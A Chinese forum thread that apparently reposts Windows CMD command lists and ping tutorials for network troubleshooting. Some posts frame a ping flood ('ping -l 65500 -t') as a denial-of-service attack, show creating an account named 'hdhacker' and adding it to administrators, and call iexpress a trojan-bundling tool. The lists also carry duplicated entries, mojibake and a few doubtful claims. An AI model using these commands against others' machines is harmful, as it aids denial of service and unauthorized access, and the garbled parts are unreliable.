Evo. G Tech Team Forum
Welcome to Evo. G Tech Team Forum. We have moved to a new website : www.evogtechteam.com

Thanks you.

by Evo. G Tech Team Management.

CMD,ping,DOS命令集

View previous topic View next topic Go down

CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:29

winver----检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr----windows更新程序
winver----检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr----windows更新程序
wscript---windows脚本宿主设置
write---写字板winmsd---系统信息
wiaacmgr---扫描仪和照相机向导
winchat---XP自带局域网聊天
mem.exe---显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2---简易widnows media player
mspaint----画图板
mstsc----远程桌面连接
mplayer2---媒体播放机
magnify---放大镜实用程序
mmc---打开控制台
mobsync---同步命令
dxdiag---检查DirectX信息
drwtsn32--- 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc---磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg---打开系统组件服务
ddeshare---打开DDE共享设置
dvdplay---DVD播放器
net stop messenger---停止信使服务
net start messenger---开始信使服务
notepad---打开记事本
nslookup---网络管理的工具向导
ntbackup---系统备份和还原
narrator---屏幕"讲述人"
ntmsmgr.msc---移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an---(TC)命令检查接口
syncapp---创建一个公文包
sysedit---系统配置编辑器
sigverif---文件签名验证程序
sndrec32---录音机
shrpubw--创建共享文件夹
secpol.msc---本地安全策略
syskey---系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
[email=Sndvol32---音罖@刂瞥绦?br%3esfc.exe---]Sndvol32---音罖@刂瞥绦?br>sfc.exe---[/email]系统文件检查器
sfc /scannow---windows文件保护
tsshutdn---60秒倒计时关机命令
tourstart---xp简介(安装完成后出现的漫游xp程序)
taskmgr---任务管理器
eventvwr---事件查看器
eudcedit----造字程序
explorer---打开资源管理器
packager---对象包装程序
perfmon.msc---计算机性能监测程序
progman---程序管理器
regedit.exe---注册表
rsop.msc---组策略结果集
regedt32---注册表编辑器
rononce -p ---15秒关机
regsvr32 /u *.dll---停止dll文件运行
regsvr32 /u zipfldr.dll---取消ZIP支持
cmd.exe---CMD命令提示符
chkdsk.exe---Chkdsk磁盘检查
certmgr.msc---证书管理实用程序
calc--启动计算器
charmap---启动字符映射表
cliconfg---SQL SERVER 客户端网络实用程序
Clipbrd---剪贴板查看器
conf---启动netmeeting
compmgmt.msc---计算机管理
cleanmgr---**整理
ciadv.msc---索引服务程序
osk---打开屏幕键盘
odbcad32---ODBC数据源管理器
oobe/msoobe /a---检查XP是否激活
lusrmgr.msc---本机用户和组
logoff---注销命令
iexpress---木马捆绑工具,系统自带
Nslookup---IP地址侦测器
fsmgmt.msc---共享文件夹管理器
utilman---辅助工具管理器
gpedit.msc---组策略
cmd(上面的都是)是windows XP系统的命令提示符,它的操作和以前的dos差不多。

ping是一个dos命令,它的作用和使用方法如下:

校验与远程计算机或本地计算机的连接。只有在安装 TCP/IP 协议之后才能使用该命令。

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list

参数

-t

校验与指定计算机的连接,直到用户中断。

-a

将地址解析为计算机名。

-n count

发送由 count 指定数量的 ECHO 报文,默认值为 4。

-l length

发送包含由 length 指定数据长度的 ECHO 报文。默认值为 64 字节,最大值为 8192 字节。

-f

在包中发送“不分段”标志。该包将不被路由上的网关分段。

-i ttl

将“生存时间”字段设置为 ttl 指定的数值。

-v tos

将“服务类型”字段设置为 tos 指定的数值。

-r count

在“记录路由”字段中记录发出报文和返回报文的路由。指定的 Count 值最小可以是 1,最大可以是 9 。

-s count

指定由 count 指定的转发次数的时间邮票。

-j computer-list

经过由 computer-list 指定的计算机列表的路由报文。中间网关可能分隔连续的计算机(松散的源路由)。允许的最大 IP 地址数目是 9 。

-k computer-list

经过由 computer-list 指定的计算机列表的路由报文。中间网关可能分隔连续的计算机(严格源路由)。允许的最大 IP 地址数目是 9 。

-w timeout

以毫秒为单位指定超时间隔。

destination-list
指定要校验连接的远程计算机。

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:29

cmd基本命令


最基本,最常用的,測試物理網路的
ping 192.168.0.8 -t ,參數-t是等待用戶去中斷測試

查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all

網路信使
Net send 電腦名/IP * (廣播) 傳送內容,注意不能跨網段
net stop messenger 停止信使服務,也可以在面板-服務修改
net start messenger 開始信使服務

探測對方對方電腦名,所在的組、域及當前用戶名 (追捕的工作原理)
ping -a IP -t ,只顯示NetBios名
nbtstat -a 192.168.10.146 比較全的

netstat -a 顯示出你的電腦當前所開放的所有埠
netstat -s -e 比較詳細的顯示你的網路資料,包括TCP、UDP、ICMP 和 IP的統計等

探測arp綁定(動態和靜態)列表,顯示所有連接了我的電腦,顯示對方IP和MAC位址
arp -a

在代理伺服器端
捆綁IP和MAC位址,解決局域網內盜用IP!:
ARP -s 192.168.10.59 00 -50-ff-6c-08-75
解除網卡的IP與MAC位址的綁定:
arp -d 網卡IP

在網路鄰居上隱藏你的電腦
net config server /hidden:yes
net config server /hidden:no 則為開啟

幾個net命令
A.顯示當前工作組伺服器列表 net view,當不帶選項使用本命令時,
它就會顯示當前域或網路上的電腦上的列表。
比如:查看這個IP上的共用資源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共用資源
資源分享名 類型 用途 注釋
--------------------------------------
網站服務 Disk
命令成功完成。

路由跟蹤命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了顯示路由外,還提供325S的分析,計算丟失包的%

關於共用安全的幾個命令
A.查看你機器的共用資源 net share
B.手工刪除共用(可以編個bat檔,開機自運行,把共用都刪了!)
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$後有空格。
C.增加一個共用:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共用成功。
同時限制鏈結用戶數為1人。

在DOS行下設置靜態IP
A.設置靜態IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地鏈結" static IP位址 mask gateway
B.查看IP設置
interface ip>show address

簡易基本指令(點"執行"直接輸入就好)
gpedit.msc-----群組原則
sndrec32-------錄音機
nslookup-------IP位址偵測器
explorer-------開啟檔案總管
logoff---------登出指令
tsshutdn-------60秒倒計時關機指令
lusrmgr.msc----本地機用戶和組
services.msc---本機服務設定
oobe/msoobe /a----檢查XP是否啟動
notepad--------開啟記事本
cleanmgr-------磁碟垃圾整理
net start messenger----開始信使服務
compmgmt.msc---電腦管理
net stop messenger-----停止信使服務
vconf-----------啟動 netmeeting
dvdplay--------DVD播放器
charmap--------啟動字元對應表
Kdiskmgmt.msc---磁牒管理實用程序
calc-----------啟動電子計算器
dfrg.msc-------磁碟重組工具
chkdsk.exe-----Chkdsk磁牒檢查
devmgmt.msc--- 裝置管理員
bFdrwtsn32------ 系統醫生
srononce -p ----15秒關機
dxdiag---------檢查DirectX資訊
regedt32-------註冊表編輯器
YMsconfig.exe---系統配置實用程序
rsop.msc-------群組原則結果集
mem.exe--------顯示記憶體使用情況
regedit.exe----註冊表
winchat--------XP自帶區域網路聊天
progman--------程序管理器
winmsd---------系統資訊
perfmon.msc----電腦效能監測程序
winver---------檢查Windows版本
sfc /scannow-----掃瞄錯誤並復原
taskmgr-----工作管理器(2000/xp/2003)
eventvwr.msc------------事件檢視器
secpol.msc----------------本機安全性設定
rsop.msc------------------原則的結果集
ntbackup----------------啟動制作備份還原嚮導
mstsc-----------遠端桌面
winver---------檢查Windows版本
wmimgmt.msc----開啟windows管理體系結構(WMI)
wupdmgr--------windows更新程序
wscript--------windows指令碼宿主設定
write----------寫字板
winmsd---------系統資訊
wiaacmgr-------掃瞄儀和照相機嚮導
winchat--------XP原有的區域網路聊天
mem.exe--------顯示記憶體使用情況
sconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠端桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------開啟控制台
mobsync--------同步指令
dxdiag---------檢查DirectX資訊
drwtsn32------ 系統醫生
devmgmt.msc--- 裝置管理員
dfrg.msc-------磁碟重組程式
diskmgmt.msc---磁牒管理實用程序
dcomcnfg-------開啟系統元件服務
ddeshare-------開啟DDE共享設定
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------開啟記事本
nslookup-------網路管理的工具嚮導
ntbackup-------系統制作備份和還原
narrator-------螢幕「講述人」
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)指令檢查連接
Usyncapp--------新增一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
psndrec32-------錄音機
shrpubw--------新增共用資料夾
secpol.msc-----本機安全原則
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本機服務設定
Sndvol32-------音量控制程序
sfc.exe--------系統檔案檢查器
sfc /scannow---windows文件保護
tsshutdn-------60秒倒計時關機指令
tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr--------工作管理器
eventvwr-------事件檢視器
eudcedit-------造字程序
explorer-------開啟檔案總管
lpackager-------對像包裝程序
perfmon.msc----電腦效能監測程序l
progman--------程序管理器
regedit.exe----註冊表
rsop.msc-------群組原則結果集
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll文件執行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示字元
chkdsk.exe-----Chkdsk磁牒檢查
certmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字元對應表
cliconfg-------SQL SERVER 客戶端網路實用程序
Clipbrd--------剪貼板檢視器
conf-----------啟動netmeeting
compmgmt.msc---電腦管理
ciadv.msc------索引服務程序
osk------------開啟螢幕小鍵盤
odbcad32-------ODBC資料來源管理器
oobe/msoobe /a----檢查XP是否啟動
lusrmgr.msc----本地機用戶和組
iexpress-------木馬元件服務工具,系統原有的
fsmgmt.msc-----共用資料夾管理器
utilman--------協助工具管理器

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:30

cmd命令的用户管理命令


今天内容是cmd命令的用户管理命令

我们每天都在使用WINDOWS,是否知道WINDOWS里的“帐号用户”呢,是的,WINDOWS登录的时候需要用帐号和密码登录,就像网络游戏一样。 而且不同的用户有不同的权限。什么是权限?比如吧,商店里的普通买家和会员用户。那么怎么知道WINDOWS里都有哪些用户呢?
   



我们可以在CMD里输入:net user
  
Administrator            Guest                    HelpAssistant
IUSR_HACK

四个帐号


那么怎么看一个帐号的权限呢,可以输入“net user 要查的帐号”,比如输入net user guest吧,


用户名                 Guest
全名
注释                   供来宾访问计算机或访问域的内置
用户的注释
国家(地区)代码         000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2002/1/1 上午 12:21
密码到期               从不
密码可更改             2002/1/1 上午 12:21
需要密码               No
用户可以更改密码       No

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               2010/1/27 下午 03:39

可允许的登录小时数     All

本地组成员             *Guests
全局组成员             *None
命令成功完成。

返回上面的内容

那么我们怎么添加一个用户呢,我来示范,可以输入“net user 帐号 密码 /add”,比如:net user hdhacker hdhacker /add,
OK!这样就添加了一个用户名为:hdhacker  密码为:hdhacker  的用户

但创建的是普通权限的用户,可以通过下面命令进行改权限。

net localgroup administrators [用户名] /add 提高权限的命令,
ok!
把用户提到administrators高级管理员用户组  
net user 用户名 /del 删除用户  下面我们来删除hdhacker这个账户,好了,删除成功,我们来看一下现在的用户,没hdhacker这个账户了

net user 用户名 /active:no 禁用用户
net user 用户名 /active:yes 启用用户
上面两个命令就不演示了,用到的不多

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:30

PING介绍


我们在DOS命令不是有个ping命令吗,它可以查到是否与其人的主机是否连接。因此,要向他人发送一个数据包。他人也就会返回一个数据包.ping IP或是主机名
它发送的实际上是一个ICMP数据包。
不知道你有没有基础,看看下面的吧

是DOS命令,一般用于检测网络通与不通

PING (Packet Internet Grope),因特网包探索器,用于测试网络连接量的程序。Ping发送一个ICMP回声清求消息给目的地并报告是否收到所希望的ICMP回声应答。  

它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原 理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定 目标主机的存在,可以初步判断目标主机的操作系统等。

Ping 是Windows系列自带的一个可执行命令。利用它可以检查网络是否能够连通,用好它可以很好地帮助我们分析判定网络故障。应用格式:Ping IP地址。该命令还可以加许多参数使用,具体是键入Ping按回车即可看到详细说明。

1.Ping本机IP

例如本机IP地址为:172.168.200.2。则执行命令Ping 172.168.200.2。如果网卡安装配置没有问题,则应有类似下列显示:

Replay from 172.168.200.2 bytes=32 time<10ms

Ping statistics for 172.168.200.2

Packets Sent=4 Received=4 Lost=0 0% loss

Approximate round trip times in milli-seconds

Minimum=0ms Maxiumu=1ms Average=0ms

如果在MS-DOS方式下执行此命令显示内容为:Request timed out,则表明网卡安装或配置有问题。将网线断开再次执行此命令,如果显示正常,则说明本机使用的IP地址可能与另一台正在使用的机器IP地址重复了。如 果仍然不正常,则表明本机网卡安装或配置有问题,需继续检查相关网络配置。

2.Ping网关IP

假定网关IP为:172.168.6.1,则执行命令Ping 172.168.6.1。在MS-DOS方式下执行此命令,如果显示类似以下信息:

Reply from 172.168.6.1 bytes=32 time=9ms TTL=255

Ping statistics for 172.168.6.1

Packets Sent=4 Received=4 Lost=0

Approximate round trip times in milli-seconds

Minimum=1ms Maximum=9ms Average=5ms

则表明局域网中的网关路由器正在正常运行。反之,则说明网关有问题。

3.Ping远程IP

这一命令可以检测本机能否正常访问Internet。比如本地电信运营商的IP地址为:202.102.48.141。在MS-DOS方式下执行命令:Ping 202.102.48.141,如果屏幕显示:

Reply from 202.102.48.141 bytes=32 time=33ms TTL=252

Reply from 202.102.48.141 bytes=32 time=21ms TTL=252

Reply from 202.102.48.141 bytes=32 time=5ms TTL=252

Reply from 202.102.48.141 bytes=32 time=6ms TTL=252

Ping statistics for 202.102.48.141

Packets Sent=4 Received=4 Lost=0 0% loss

Approximate round trip times in milli-seconds

Minimum=5ms Maximum=33ms Average=16ms

则表明运行正常,能够正常接入互联网。反之,则表明主机文件(windows/host)存在问题。

--PING命令参数详解

-a 将目标的机器标识转换为ip地址

-t 若使用者不人为中断会不断的ping下去

-c count 要求ping命令连续发送数据包,直到发出并接收到count个请求

-d 为使用的套接字打开调试状态

-f 是一种快速方式ping。使得ping输出数据包的速度和数据包从远程主机返回一样快,或者更快,达到每秒100次。在这种方式下,每个请求用一个句点表示。对于每一个响应打印一个空格键。

-i seconds 在两次数据包发送之间间隔一定的秒数。不能同-f一起使用。

-n 只使用数字方式。在一般情况下ping会试图把IP地址转换成主机名。这个选项要求ping打印IP地址而不去查找用符号表示的名字。如果由于某种原因无法使用本地DNS服务器这个选项就很重要了。

-p pattern 拥护可以通过这个选项标识16 pad字节,把这些字节加入数据包中。当在网络中诊断与数据有关的错误时这个选项就非常有用。

-q 使ping只在开始和结束时打印一些概要信息。

-R 把ICMP RECORD-ROUTE选项加入到ECHO_REQUEST数据包中,要求在数据包中记录路由,这样当数据返回时ping就可以把路由信息打印出来。每个数据包只能记录9个路由节点。许多主机忽略或者放弃这个选项。

-r 使ping命令旁路掉用于发送数据包的正常路由表。

-s packetsize 使用户能够标识出要发送数据的字节数。缺省是56个字符,再加上8个字节的ICMP数据头,共64个ICMP数据字节。

-v 使ping处于verbose方式。它要ping命令除了打印ECHO-RESPONSE数据包之外,还打印其它所有返回的ICMP数据包。
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
《ping的参数!》

  Ping 命令可以用来验证与远程计算机的连接。(该命令只有在安装了TCP/IP协议后才能使用)

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r
count] [-s count] [[-j computer-list] | [-k computer-list]] [-w
timeout] destination-list

参数说明:
-t :一直Ping指定的计算机,直到从键盘按下Control-C中断。
-a :将地址解析为计算机NetBios名。
-n :发送count指定的ECHO数据包数。,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助。能
够测试发送数据包的返回平均时间,及时间的快慢程度。默认值为 4。
-l :发送指定数据量的ECHO数据包。默认为 32 字节;最大值是65500byt。
-f :在数据包中发送“不要分段”标志,数据包就不会被路由上的网关分段。通常你所发送的数据包都会通过路由分
段再发送给对方,加上此参数以后路由就不会再分段处理。
-i :将“生存时间”字段设置为TTL指定的值。指定TTL值在对方的系统里停留的时间。同时检查网络运转情况的。
-v :tos 将“服务类型”字段设置为 tos 指定的值。
-r :在“记录路由”字段中记录传出和返回数据包的路由。通常情况下,发送的数据包是通过一系列路由才到达目
标地址的,通过此参数可以设定,想探测经过路由的个数。限定能跟踪到9个路由。
-s :指定 count 指定的跃点数的时间戳。与参数-r差不多,但此参数不记录数据包返回所经过的路由,最多只记
录4个。
-j :利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源) IP 允许的
最大数量为 9。
-k :computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格

源)IP 允许的最大数量为 9。
-w:timeout 指定超时间隔,单位为毫秒。
destination-list: 指定要 ping 的远程计算机。

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:30

PING命令的高级用法


对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家分享一下。
  现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:


本帖隐藏的内容需要回复才可以浏览


Options:

-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

不停的ping地方主机,直到你按下Control-C。
此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。
-a Resolve addresses to hostnames.

解析计算机NetBios名。

示例:
C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。
-n count Number of echo requests to send.
发送count指定的Echo数据包数。
  在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
  从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
   在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送 65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次 发送的数据包大于或等于65532时,对方就很有可能当机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限 制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿 轻易施于别人机器上,否则后果自负)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
   这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那 么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络 就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。
-f Set Don';t Fragment flag in packet.
在数据包中发送“不要分段”标志。
在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。
-i TTL Time To Live.
指定TTL值在对方的系统里停留的时间。
此参数同样是帮助你检查网络运转情况的。
-v TOS Type Of Service.
将“服务类型”字段设置为 tos 指定的值。
-r count Record route for count hops.
在“记录路由”字段中记录传出和返回数据包的路由。
   在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9 个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:
C:\>ping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
   从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。

-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。

-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。

-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。

-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数没有什么其他技巧。
   ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是 UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在 240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20

cyjian
Spammer
Spammer

Posts : 211
Points : 25655
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

Re: CMD,ping,DOS命令集

Post by cyjian on December 12th 2014, 10:30

PING命令攻击(仅供学习)


ping ip -t 这个命令可以不断地对指定ip进行ping攻击,只要对方在线就无法躲避
---------------------------------------------------------------------
ping 命令的用法Ping
Ping是个使用频率极高的实用程序,用于确定本地主机是否能与另一台主机交换(发送与接收)数据报。根据返回的信息,你就可以推断TCP/IP参数是否 设置得正确以及运行是否正常。需要注意的是:成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP配置就是正确的,你必须执行大量的本地主机 与远程主机的数据报交换,才能确信TCP/IP的正确性。
简单的说,Ping就是一个测试程序,如果Ping运行正确,你大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故 障,从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送,Ping也被某些别有用心的人作为DDOS(拒绝服务攻击)的工具,前 段时间Yahoo就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。
按照缺省设置,Windows上运行的Ping命令发送4个ICMP(网间控制报文协议)回送请求,每个32字节数据,如果一切正常,你应能得到4个回送应答。
Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短,表示数据报不必通过太多的路由器或网络连接速度比较快。Ping 还能显示TTL(Time To Live存在时间)值,你可以通过TTL值推算一下数据包已经通过了多少个路由器:源地点TTL起始值(就是比返回TTL略大的一个2的乘方数)-返回时 TTL值。例如,返回TTL值为119,那么可以推算数据报离开源地址的TTL起始值为128,而源地点到目标地点要通过9个路由器网段 (128-119);如果返回TTL值为246,TTL起始值就是256,源地点到目标地点要通过9个路由器网段。
通过Ping检测网络故障的典型次序
正常情况下,当你使用Ping命令来查找问题所在或检验网络运行情况时,你需要使用许多Ping命令,如果所有都运行正确,你就可以相信基本的连通性和配 置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障:
ping 127.0.0.1--这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。
ping 本机IP--这个命令被送到你计算机所配置的IP地址,你的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此 问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。
ping 局域网内其他IP--这个命令应该离开你的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果 收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。
ping 网关IP--这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。
ping 远程IP--如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。
ping localhost--localhost是个作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。
ping [You must be registered and logged in to see this link.] ... 地址,通常是通过DNS 服务器 如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障(对于拨号上网用户,某些ISP已经不需要设置DNS服务器了)。顺便说 一句:你也可以利用该命令实现域名对IP地址的转换功能。
如果上面所列出的所有Ping命令都能正常运行,那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示你所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些方法检测到。
Ping命令的常用参数选项
ping IP -t--连续对IP地址执行Ping命令,直到被用户以Ctrl+C中断。
ping IP -l 2000--指定Ping命令中的数据长度为2000字节,而不是缺省的32字节。
ping IP -n--执行特定次数的Ping命令。
Netstat Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据,一般用于检验本机各端口的网络连接情况。
如果你的计算机有时候接受到的数据报会导致出错数据删除或故障,你不必感到奇怪,TCP/IP可以容许这些类型的错误,并能够自动重发数据报。但如果累计 的出错情况数目占到所接收的IP数据报相当大的百分比,或者它的数目正迅速增加,那么你就应该使用Netstat查一查为什么会出现这些情况了。
---------------------
ping的几个常见用法
用了这么久的ping命令,这是我第一次把相关的经验总结写出来,希望大家喜欢。
先来说说ping的工作原理:
ping的过程实际上就是一个发送icmp echo请求的过程,发送该数据包到被ping 的一方,要求对方响应并回答该数据包,对方收到后,当然就老老实实地答复你了,也许大家奇怪,为什么从ping的结果中会得到ip地址,这是因为,对方做 出的icmp响应并不能简单地用icmp进行封包就进行传输,而是要经过ip协议进行封装并传输的,学过tcp/ip的人都知道,在ip协议对数据包进行 封装的时候,会自动将目的地址和源地址写进包头,这样一来,在回应的信息中我们就可以看到对方的ip地址了 。
一个ping的返回结果:
c:\>ping python
pinging python [192.168.0.2] with 32 bytes of data:
reply from 192.168.0.2: bytes=32 time<10ms ttl=255
reply from 192.168.0.2: bytes=32 time<10ms ttl=255
reply from 192.168.0.2: bytes=32 time<10ms ttl=255
reply from 192.168.0.2: bytes=32 time<10ms ttl=255
ping statistics for 192.168.0.2:
packets: sent = 4, received = 4, lost = 0 (0% loss),
approximate round trip times in milli-seconds:
minimum = 0ms, maximum = 0ms, average = 0ms
